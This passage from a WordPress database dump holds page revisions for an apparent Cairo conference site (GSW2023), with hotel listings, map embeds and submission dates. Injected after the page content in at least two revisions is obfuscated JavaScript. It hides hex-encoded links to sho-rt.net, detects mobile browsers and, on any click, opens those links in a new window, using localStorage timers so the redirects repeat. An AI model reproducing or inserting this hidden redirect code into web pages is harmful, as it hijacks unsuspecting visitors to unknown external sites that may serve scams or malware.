)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 04:21:56','2023-02-04 04:21:56','',3066,'https://gsw2023.com/?p=3746',0,'revision','',0),
(3747,1,'2023-02-04 04:42:54','2023-02-04 04:42:54','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p>&nbsp;<br />\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n<a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-02-04 04:42:54','2023-02-04 04:42:54','',2685,'https://gsw2023.com/?p=3747',0,'revision','',0),
(3748,1,'2023-02-04 04:45:39','2023-02-04 04:45:39','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 